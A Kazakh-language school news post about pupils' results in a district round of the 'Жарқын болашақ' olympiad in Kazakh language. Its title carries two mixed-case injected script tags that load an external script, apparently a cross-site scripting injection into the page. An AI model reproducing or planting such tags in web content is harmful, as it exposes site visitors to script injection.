"Жарқын болашақ" олимпиадасы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.02.2020

 

 

    Жыл сайын өткізіліп отыратын «Жарқын болашақ» олимпиадасы 2020 жылы 7 ақпан күні 7-11 сыныптар арасында қазақ тілі пәні бойынша аудандық кезеңін өткізді.

Олимпиаданың мақсаттары мен міндеттері:

- мемлекеттік тілді қолдану аясын кеңейту;

- қазақ халқының мәдени, әдеби және рухани құндылықтарын тарату;

- оқушылардың шығармашылық және зерттеулік қабілеттерін дамыту;

- оқушыларға қазақ тіліне, дәстүр мен тарихқа деген қызығушылықты баулу.      

«Жарқын болашақ» олимпиадасының Ережесіне сәйкес бес бағыт бойынша өтті: «Бейнелеушілер», «Білгірлер бәйгесі», «Жас қаламгер», «Сөз шеберлері», «Әнші бұлбұлдар». Біздің мектебімізден «Бейнелеушілер» бағыты бойынша Кучиров Кирилл қатысып, берілген тақырып бойынша суретті салып, оны комикс жанрына айналдырып бейнелеуде 2 орынды жеңіп алды. «Сөз шеберлері» бағыты бойынша  белгілі тақырып бойынша жатқа өлеңді мәнерлеп оқуға 9 сынып оқушысы Чечушкова Юлия, 7 сынып оқушысы Лизун Валентина, 6 сынып оқушысы Пузач Владислав өз өнерлерін ортаға салды,  Пузач Владислав 3 орынды иеленді. «Әнші бұлбұлдар» бағыты бойынша мемлекеттік тілде белгілі бір тақырып бойынша халық әнін орындауға Воронина қатысып, 3 орынды иеленді. Кучеров Кирилл 9 сынып оқушысы «Бейнелеушілер» номинациясы бойынша облыстық кезеңге жолдама алды. Жеңімпаздарымызды құттықтаймыз!!!

Просмотров: 498


Пікір қосу



Деректерді қолтаңбаға қосу